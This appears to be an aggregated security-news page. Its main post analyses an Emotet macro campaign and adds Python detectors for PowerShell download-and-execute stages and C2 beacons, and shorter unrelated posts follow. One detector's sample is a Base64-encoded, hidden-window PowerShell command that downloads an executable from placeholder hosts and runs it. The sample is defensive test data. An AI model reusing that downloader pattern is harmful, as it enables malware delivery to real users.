The Emotet malware is a very destructive banking Trojan that was first identified in 2014. Over the years it has evolved with new capabilities and functionalities, prompting cybersecurity agencies like the Australian Cyber Security Centre and US-CERT to issue advisories. Emotet malware generally spreads via malicious documents that drop a modular Trojan bot, which is used to download and install additional remote access tools. We wrote a blog post in January 2019 about how the malware had changed tactics, leading to a spike in the number of Emotet malware attacks. In the last week, we have observed a spike in the number of Emotet malware transactions across our customer base. US-CERT has also issued a fresh advisory regarding the recent spate of attacks.
Our research has discovered that the Emotet malware is still very active and continues to be one of the most destructive malware attacks. The malware has evolved through the years, and the actors behind Emotet have used the infected endpoints to build out a formidable botnet that is used to distribute multiple malware families such as Trickbot and Dridex, as well as ransomware such as Ryuk.
After taking a break through the holiday season in 2019, Emotet malware attacks restarted in 2020, this time targeting the financial services industry. As in previous versions, the Emotet malware is only the initial attack vector used to launch the attack. The attack begins with a malicious Microsoft Word document that is designed to be downloaded and opened by the user. Once opened, the malicious macro executes and contacts the command-and-control server to initiate the next stage of the attack.
Menlo Security Research analyzed the topics listed below to gain a better understanding of this most recent Emotet malware attack. Data for this analysis was obtained from the Menlo Security Cloud Platform, which supports millions of users across all industries, including financial services, educational institutions, and the military. In addition to analyzing the Emotet document macro and loader, the analysis breaks down the following for this most recent attack spike and shows the distribution of the industries affected.
- Emotet Kill Chain
- Industries targeted
- Distribution of Emotet hosting domains
- Emotet controller IP distribution
Recent news shows that Emotet infections have crippled daily operations in a number of organizations. Emotet usually propagates in bursts, through delivery of malicious documents via mass compromised websites. Each infected host is then used to build out a botnet. The Menlo Security Research team noticed a spike in Emotet malware activity in January 2020. This spike was detected through our cloud isolation platform, which renders email attachments and websites visited from emailed links remotely, eliminating the possibility that malicious documents would reach an end user’s computer.
The spike in activity occurred during January 14–22, affecting customers using our isolation service in the United States, Europe, and Asia. The following chart shows a spike in the number of Emotet document requests from January 14–22, 2020.
Chart: Spike in Emotet malware detected, January 14–22, 2020.
The Emotet Kill Chain
Like other Emotet malware versions, this recent attack also used malicious macros in a Microsoft Word document. The emails were crafted to appear as legitimate banking or financial transactions. Some examples of the subject lines used in this most recent campaign are given below.
The January 2020 campaign appeared to follow the kill chain similar to the attacks observed in late 2019. The initial attack is used only to gain a foothold in the network and establish contact with the command-and-control server. Once in place, additional malware is downloaded and the malware attempts to spread to other computers on the same network.
Figure: Emotet malware kill chain.
From the above flow, we can divide the Emotet kill chain as follows:
- Hosting of malicious documents via compromised websites.
- Every malicious document has an embedded macro with a list of stage one URLs to try (usually three or four in the list, depending on the sample).
- The Emotet loader establishes a command-and-control channel by selecting a server IP from a list of built-in C2 IP addresses.
Distribution and Infrastructure
Our data shows that the January 2020 campaign targeted financial services companies primarily in the United States. The following charts show the industry/vertical distribution and regions where these requests came from. Other industries and geographies were included in the attack, though to a far lesser degree.
One of the techniques that Emotet malware uses is to distribute itself through other compromised legitimate websites, essentially creating new zero-day attacks. This makes the malware particularly difficult to protect against since the source of the malware is constantly changing. The following chart categorizes the distribution of the initial delivery URLs that served the malicious documents. The data shows very clearly why Emotet malware continues to evade security defenses and wreak havoc: 76 percent of the URLs used to distribute Emotet malware are actually categorized as safe by the leading threat intelligence databases. Some of the compromised websites were from academic institutions. This means that security products would not block or prohibit users from accessing and downloading content from these sites. Fortunately, Menlo Security customers were fully protected, because these malicious sites would have been viewed in isolation—completely protecting the end user.
Malicious Document Macro
Once the embedded macro inside the document is enabled, it spawns PowerShell to try a list of URLs to fetch the initial Emotet loader. Some observations of the macro behavior:
- The macro constructs the PowerShell command by decoding data from a user form.
- The PowerShell code is stored as a “Tag” property of a frame in the user form, and this frame is used to mask the other elements in the user form.
- The PowerShell code that finally gets executed is Base64 encoded, which tries to download the Emotet loader by trying a list of URLs.
- It uses Net.WebClient.DownloadFile to fetch the loader from the URL and [Diagnostics.Process]::Start to launch it if the download was successful.
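The macro behaviour described above is what a defender can look for in PowerShell script block logging (Event ID 4104), where the Base64-encoded command the macro spawns is recorded. The following is an added detection example written for this post, not code from Menlo Security or from the malware: it decodes an -EncodedCommand argument (UTF-16LE under Base64, which is what PowerShell expects), then scans both the raw and decoded text for the primitives the post names (Net.WebClient.DownloadFile, [Diagnostics.Process]::Start) and for the list of three or more stage-one URLs. The sample script blocks, the .invalid hostnames, the indicator names and the scoring threshold are all constructed for the example.

```python
import base64
import re

# Behaviours the writeup attributes to the macro's PowerShell stage: a Base64-encoded
# command that walks a list of URLs, fetches the loader with Net.WebClient.DownloadFile
# and runs it with [Diagnostics.Process]::Start. Indicator names are our own.
INDICATORS = {
    "webclient_downloadfile": re.compile(r"Net\.WebClient.{0,200}?DownloadFile", re.I | re.S),
    "process_start": re.compile(r"\[Diagnostics\.Process\]::Start", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"(),;]+", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENCODED_ARG_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text):
    """Return the UTF-16LE plaintext behind an -EncodedCommand argument, or None."""
    m = ENCODED_ARG_RE.search(text)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_script_block(script_block, min_urls=3):
    """Score one PowerShell script block (e.g. the ScriptBlockText of Event ID 4104).

    Both the raw text and the decoded command (when present) are scanned, so that
    indicators hidden behind Base64 are still seen. Threshold of 3 is a constructed choice.
    """
    decoded = decode_encoded_command(script_block)
    views = [script_block] + ([decoded] if decoded else [])
    hits = sorted({name for name, rx in INDICATORS.items() for v in views if rx.search(v)})
    urls = sorted({u for v in views for u in URL_RE.findall(v)})
    score = len(hits)
    if decoded:
        score += 1            # an encoded command launched from a document is itself notable
    if len(urls) >= min_urls:
        score += 1            # a list of fallback download locations, as the post describes
    return {"decoded": decoded, "hits": hits, "urls": urls, "score": score,
            "suspicious": score >= 3}


def encode_for_powershell(plaintext):
    """Encode a command the way PowerShell's -EncodedCommand expects it (UTF-16LE, Base64)."""
    return base64.b64encode(plaintext.encode("utf-16-le")).decode("ascii")


# Constructed sample: the tokens mirror the post's description; hosts are placeholders.
_SUSPICIOUS_PLAINTEXT = (
    "$p=$env:TEMP+'\\x.exe';"
    "$u='http://site-a.invalid/wp-content/a','http://site-b.invalid/b','http://site-c.invalid/c';"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$p);"
    "[Diagnostics.Process]::Start($p);break}catch{}}"
)

SAMPLE_SCRIPT_BLOCKS = [
    # Benign administrative command, plain text.
    "Get-ChildItem -Path C:\\Logs -Filter *.log | Sort-Object LastWriteTime",
    # Encoded downloader stage as the macro would spawn it (constructed).
    "powershell -nop -w hidden -enc " + encode_for_powershell(_SUSPICIOUS_PLAINTEXT),
]

if __name__ == "__main__":
    for block in SAMPLE_SCRIPT_BLOCKS:
        r = analyze_script_block(block)
        print(r["suspicious"], r["score"], r["hits"], r["urls"])
```

In a real deployment the script blocks would come from the Microsoft-Windows-PowerShell/Operational log rather than the embedded list; the useful signal is the combination of an encoded command, a download-and-execute pair, and several fallback URLs, since any one of them alone is common in legitimate administration.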
Current Emotet Loader and Controller Infrastructure
Further analysis shows that the January 2020 Emotet malware was a far-reaching campaign that was executed through multiple networks. A concentration of IP addresses occurred in certain countries with global financial centers.
The final Emotet bot that gets dropped is usually a modular Trojan that establishes a command-and-control channel by choosing an IP from a list of IP addresses in its config file. The Emotet loader is very well researched and documented, so we will not get into the inner workings of this bot here. Some of the variations we observed:
- We noticed that the initial dropper copies itself to “SysWOW64” and is invoked with a parameter that looks like a random number (–94737736).
- Other characteristics exhibited were typical of a standard Emotet loader:
  - It extracts system information, enumerates running processes (CreateToolhelp32Snapshot), bundles the data using protobuf, and encrypts it with an AES key (which is secured with an embedded RSA public key).
  - The encrypted POST request to the C2 IP seems to use a randomly generated string parameter that is form-urlencoded, which seems to be a slight change from previous payload URL patterns.
  - For some of the controller IPs, we observed HTTP traffic being sent over port 443.
- A sample encrypted C2 payload is shown below:
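The C2 traits listed above (encrypted, form-urlencoded POSTs straight to an IP address from the built-in list, and plain HTTP sent to port 443) are visible in egress proxy logs even though the payload itself is encrypted. The following is an added detection example written for this post, not the sample payload and not Menlo Security's code: it parses a constructed, space-separated proxy log format (the field layout is our assumption, as are the client and destination addresses, which use documentation ranges) and flags requests that combine a POST to a bare IP, a form-urlencoded body, and an http:// URL on port 443.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed proxy log (not from the writeup). Fields, space separated:
# timestamp client_ip method url dest_port content_type status bytes
SAMPLE_PROXY_LOG = """\
2020-01-15T10:02:11Z 10.1.4.22 GET https://www.example.com/index.html 443 text/html 200 5120
2020-01-15T10:02:40Z 10.1.4.22 POST https://login.example.com/auth 443 application/x-www-form-urlencoded 302 410
2020-01-15T10:03:05Z 10.1.4.22 POST http://203.0.113.45/ 443 application/x-www-form-urlencoded 200 1312
2020-01-15T10:03:09Z 10.1.4.22 POST http://203.0.113.45/ 8080 application/x-www-form-urlencoded 200 1288
2020-01-15T10:04:50Z 10.1.4.31 GET http://198.51.100.7/update.txt 80 text/plain 200 88
"""


def parse_proxy_log(text):
    """Turn the constructed log format into dicts; a real proxy would need its own parser."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, port, ctype, status, nbytes = line.split()
        records.append({"ts": ts, "client_ip": client, "method": method, "url": url,
                        "port": int(port), "content_type": ctype,
                        "status": int(status), "bytes": int(nbytes)})
    return records


def is_bare_ip(host):
    """True when the request host is a literal IP rather than a name (no DNS lookup involved)."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def score_request(rec):
    """Return the list of loader-like traits (names are our own) present in one request."""
    reasons = []
    u = urlsplit(rec["url"])
    host = u.hostname or ""
    if rec["method"] == "POST" and is_bare_ip(host):
        reasons.append("post_to_bare_ip")
    if u.scheme == "http" and rec["port"] == 443:
        reasons.append("plain_http_on_443")
    if (rec["method"] == "POST" and is_bare_ip(host)
            and rec["content_type"].startswith("application/x-www-form-urlencoded")):
        reasons.append("form_urlencoded_post_to_ip")
    return reasons


def find_loader_beacons(text, min_reasons=2):
    """Requests with at least min_reasons traits; the threshold is a constructed choice."""
    found = []
    for rec in parse_proxy_log(text):
        reasons = score_request(rec)
        if len(reasons) >= min_reasons:
            found.append((rec["client_ip"], rec["url"], rec["port"], reasons))
    return found


if __name__ == "__main__":
    for client, url, port, reasons in find_loader_beacons(SAMPLE_PROXY_LOG):
        print(client, url, port, ", ".join(reasons))
```

The plain-HTTP-on-443 check only works when the proxy records the scheme or inspects the first bytes of the connection; a flow record that logs only the destination port cannot tell HTTP from TLS, and a legitimate form POST to a named host (the second sample line) is deliberately left alone.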
The Emotet malware has built a formidable infrastructure over time and can be destructive to an organization if not mitigated in a timely manner. Its techniques of leveraging multistage attacks and distributing malicious code through legitimate websites make the Emotet malware particularly hard to prevent with traditional security products that rely on signatures or threat intelligence.
To protect against Emotet malware attacks, enterprises should:
- Be wary of macro-enabled, untrusted Office documents.
- Vet PowerShell execution policies for Windows users in an organization.
For threat response teams: Keep a close watch on the techniques used by the Emotet actors; https://attack.mitre.org/software/S0367/ has a specific ATT&CK framework page for Emotet.
Contact Menlo Security today to learn more about the Menlo Security Secure Internet with an Isolation Core.
The post #cybersecurity | #hackerspace | Emotet attacks— a spike to start the year… appeared first on National Cyber Security.
View full post on National Cyber Security
Love it or hate it, there’s no denying the unstoppable force of Black Friday. What started off as a tradition across the pond has now become the highlight of every British bargain-hunter’s calendar.
Whether you’re brave enough to flock to Oxford Street or prefer to shop online from the comfort of your own bed, there are serious savings to be had. Laptops, games consoles and clothes are all sold at a fraction of the price – perfect if you want to do some early Christmas shopping.
Because this event only comes around once a year, you need to be as prepared as possible – ideally, knowing exactly what you’re looking to buy. To help you prepare for your guilt-free shopping spree, therefore, we have created a guide of everything you need to know about Black Friday – including the start date, how to find the best deals, how to be safe when shopping online, and predictions of this year’s big-sellers.
What is Black Friday?
Black Friday is a tradition that originates from America, where retailers cut prices on a huge range of items the day after Thanksgiving. However, in recent years Britain has also jumped on the bandwagon.
As such, you can expect major UK retailers to cut prices on a large selection of items – including big-budget electrical items, beauty gift sets, kitchen equipment and clothes.
The post #cyberfraud | #cybercriminals | What date do the sales start and how to find the best offers? appeared first on National Cyber Security.
Oct. 2, 2019 – October is National Cybersecurity Awareness Month, so it’s a good time for law firms to revisit their cybersecurity practices to determine if they have the necessary defenses in place. But legal technology experts say law firms are behind.
Attorneys Dennis Kennedy and Tom Mighell recently discussed law firm cybersecurity on their podcast, the Kennedy-Mighell Report. Despite constant news about data breaches and law firms as targets, many solo and small firms still don’t do enough.
Mighell said he has spoken to many lawyers who don’t upgrade their systems and keep running programs that are unsupported, such as the Microsoft Windows 7 operating system. But unsupported programs are unlocked doors for lurking data thieves.
“Part of the problem is there continues to be brand new ways that bad people can get to us, and keeping up with it all is overwhelming,” said Mighell, chair of the American Bar Association’s Law Practice Management Section.
Christopher Shattuck, who manages the State Bar of Wisconsin’s Law Practice Assistance Program (Practice 411), says cybersecurity is a practice management issue that Wisconsin lawyers must address since ethics rules (SCR 20:1.1, Comment 8) require lawyers to “keep abreast of changes in the law and its practice, including the benefits and risks associated with relevant technology.”
“Many calls that come through the Practice 411 program are related to cybersecurity and what firms should be doing,” Shattuck said. “The solutions will vary by practice, but we can help lawyers and law firms develop plans that are most appropriate for them.”
Keep the Doors Locked
Implementing security protocols doesn’t have to be overwhelming. Consider simple steps like upgrading outdated programs or devices, using strong passwords, and embracing two-factor authentication, which would have prevented the following breach:
Joe Forward, Saint Louis Univ. School of Law 2010, is a legal writer for the State Bar of Wisconsin, Madison. He can be reached by email at jforward@wisbar.org or by phone at (608) 250-6161.
A small firm is using Office 365, a cloud-based subscription service that provides a suite of applications for individuals and businesses, such as Word, Excel and Outlook. There are built-in security systems that can help law firms stay secure, but consider what can happen:
Hackers are able to access a user’s Office 365 account because the user’s password is very weak. Then the hackers send emails, impersonating the user (the payroll manager), and get two payroll checks diverted to a different bank. That money is gone.
“There were two opportunities to stop that hacker dead in its tracks,” Mighell said. “The first would be to set a strong password that would be much more difficult to break.”
According to one cybersecurity expert, an eight-character password can take minutes to crack, whereas a 20-character password can take months. Secure password managers can help law firms and lawyers maintain longer, unique passwords.
“Even if the password could have been broken, two-factor authentication would have stopped it. If it’s done right, it’s 99 percent effective,” Mighell said.
With two-factor authentication, a user who logs into an online program could choose to receive a text with a numeric code that is required for login. Applications like Authy provide a two-factor authentication solution to protect online accounts.
Don’t Use Outdated Software
One of the biggest cybersecurity problems is running outdated systems. When operating systems and programs reach “end-of-life,” they are no longer supported by developers. That includes an end to security updates and patches.
A 2016 lawsuit against a Chicago-based law firm illustrates the potential harm that can occur if law firms use outdated programs. A client sued the firm for running outdated programs that allowed attorneys to remotely access the firm’s network via the internet, including time entry software, a virtual network system, and the firm’s email system.
For instance, attorneys could access a time-tracking program with a user name and password. But the client-plaintiff alleged the law firm “improperly configured the service and left it running out of date software” that was more than a decade old.
The client-plaintiff also alleged the firm’s virtual private network (VPN), which allowed attorneys to access the firm’s files and documents off-site, was not implemented properly and left the whole network open to “Man in the Middle” attacks.
Such attacks allow hackers to eavesdrop on communications and steal confidential information, especially when the faulty VPN, supporting insecure renegotiation, is accessed on public connections at conference centers, cafes, or other public networks.
The client’s lawsuit, which ultimately entered arbitration under the firm’s engagement letter, alleged breach of contract and fiduciary duty, and negligent legal malpractice.
Law firms don’t have to go it alone. Solo and smaller firms that don’t have in-house technical expertise can outsource IT services to Managed Service Providers (MSPs). Given the ethical duty to protect client data, this may be a necessary expense.
According to an article by the Florida Justice Technology Center, using MSPs “is an incredibly effective method of preventing cybersecurity breaches as the IT systems are managed by a third-party who are experts in securing systems. The MSP is contractually obliged to patch the operating systems, patch the applications, and update the firmware and microcode on the associated hardware,” the article states.
Cybersecurity experts Sharon Nelson and John Simek of Sensei Enterprises recently addressed common cybersecurity questions in the June 2019 Wisconsin Lawyer. The article highlights simple things law firms can do to shore up their law firm security.
Do a Security Assessment. “The assessment is usually done using software tools and involves a thorough review of your network. The result is generally a report identifying critical, medium-level, and low-level vulnerabilities. A security assessment tends to come with a proposal for (at least) remediating the critical vulnerabilities along with the estimated cost. We believe it is wise to do these assessments, using a certified third-party cybersecurity company, annually.”
Train Employees. “There is no getting around the absolute need for annual employee cybersecurity training. It is generally somewhat inexpensive and covers the basics of current threats and how to avoid such things as clicking on suspicious links and attachments, going to sketchy websites, giving information over the phone (duped by social engineering), and many other easy-to-make mistakes. A solid hour of good training each year is a small price to pay for educating your employees and creating a culture of cybersecurity.”
Use Password Managers. “Beyond a doubt, the most important security tip is do not reuse passwords! The bad guys are now using computer bots to force attacks using passwords revealed from past data breaches. If you continue to reuse passwords, there is a high probability that the password will be used against other systems. This is another great reason to use password managers; doing so makes it easier to have unique passwords for every system.”
Move Law Firm Data to the Cloud. “Virtually all cybersecurity experts now agree that the cloud will protect your data better than you will. Is the cloud absolutely secure? Of course not. But do law firms, especially solo practices and small firms, tend to be woefully insecure? Yes, they do.”
Try to Keep Up with Technology. Resources such as Attorney at Work, Bob Ambrogi’s LawSites blog, and of course, Wisconsin Lawyer, help attorneys stay on top of new developments in the areas of technology and cybersecurity. “Don’t forget continuing legal education – and ask your colleagues for recommendations regarding speakers who both inform and entertain,” Nelson and Simek wrote. The 2019 Wisconsin Solo and Small Firm Conference has an entire track of CLE programming dedicated to technology and practice management, including cybersecurity.
Don’t Click on Suspicious Links in Emails. A common cybersecurity threat involves “phishing,” where third parties will impersonate someone in your network with genuine-looking emails that contain links to unleash malware or other viruses. Examine emails carefully before clicking on links or call the purported sender to confirm.
You Might Also Be Interested In …
The post #nationalcybersecuritymonth | Law Firm Cyber Security: Start Simple: appeared first on National Cyber Security.
The campaign, sponsored by an insurance company, intends to demonstrate how often hacking attempts are made on a typical small business site.
A variety of recent campaigns have employed digital billboards to show imagery in response to data from weather, traffic conditions, social posts from passersby and commute times.
Today, a new week-long campaign launches in the UK: Dozens of digital displays will demonstrate the frequency of hacking attempts on a typical small business’s website.
Called the Honeypot Poster by campaign sponsor Hiscox insurance, the displays show dots that demonstrate live hacking attempts on custom, “honeypot” proxy servers of the sort that might host a typical small business website, except there was no virus or firewall protection. The servers hold some data but no personal or sensitive info.
The displays show changing dots inside the words “Cyber Attack,” with each dot representing a hacking attempt and a numerical counter showing the daily attacks thus far. During the trial period for the campaign, the hacking attempts averaged 23,000 daily, sometimes peaking as high as 60,000, from Russia, Vietnam, the UK and elsewhere around the world.
The point, Hiscox Head of Marketing and Partnerships Olivia Hendrick said in a statement, is to make “small businesses more aware of the very real threat that cybercrime poses and challenging the belief that cyber criminals only target larger organisations.”
View full post on National Cyber Security Ventures
The worldwide “ransomware” cyberattack spread to thousands more computers on Monday as people logged in at work, disrupting business, schools, hospitals and daily life, though no new large-scale breakdowns were reported. In Britain, whose health service was among the first high-profile targets of the attack Friday, some hospitals and doctors’ offices were still struggling to recover. The full extent …
The post Monday morning blues as ‘WannaCry’ hits at workweek’s start appeared first on National Cyber Security Ventures.
Have you been single for a long time? Do you want to get back into the exciting world of finally finding that special someone? Here are our tips! Sometimes, if you go for long enough without dating, beginning the process again can seem overwhelming. Read More….
The post How to Start Dating Again: 9 Steps to Get Back in the Game appeared first on Dating Scams 101.
View full post on Dating Scams 101
Met someone new, and need advice for when things get sexy? Here are 30 sexting examples to get a head start on texting dirty, and steaming it up. Sexting is an art form, capable of bringing two interested individuals together for the first time, or keeping an established couple passionate about each other. Read More….
The post 30 Hot, Sexting Examples to Start a Naughty Text Marathon appeared first on Dating Scams 101.
In a Pastebin post entitled “ECA vs. Assad | Part 1,” Zer0Pwn published sample data, along with a SendSpace link to the full databases.
The sample data includes full names, user names, encrypted passwords, e-mail addresses and phone numbers.
The file on SendSpace includes more than 60,000 full names, user names, phone numbers and home addresses, along with encrypted passwords for Jobs.sy and clear text passwords for RealEstate.sy.
Cyber War News notes that other recent targets of the European Cyber Army have included syrianmonster.com, syria-courts.com, sana.sy, moj.gov.sy, and banquecentrale.gov.sy.
Syria needs to work harder on its website security, given that it has already been warned.
View full post on Am I Hacker Proof
The gang, who have dubbed themselves ‘CYBER JIHADIS’, sent a ransom demand after successfully hacking the entire customer database of the communications giant.
The phone and broadband provider said credit card details, bank details and other personal information were stolen.
TalkTalk said it was “too early to say” how many of its four million UK customers had been affected by the attack.
But today it emerged that attempts – strangely low-level attempts – had already been made to raid customers’ cash.
Discussing the identity of the hackers Adrian Culley, a former detective in the Metropolitan Police’s cyber crime unit, told the BBC Radio 4’s Today Programme:
The post Talk Talk hackers start raids on customers’ bank accounts appeared first on Parent Security Online.
View full post on Parent Security Online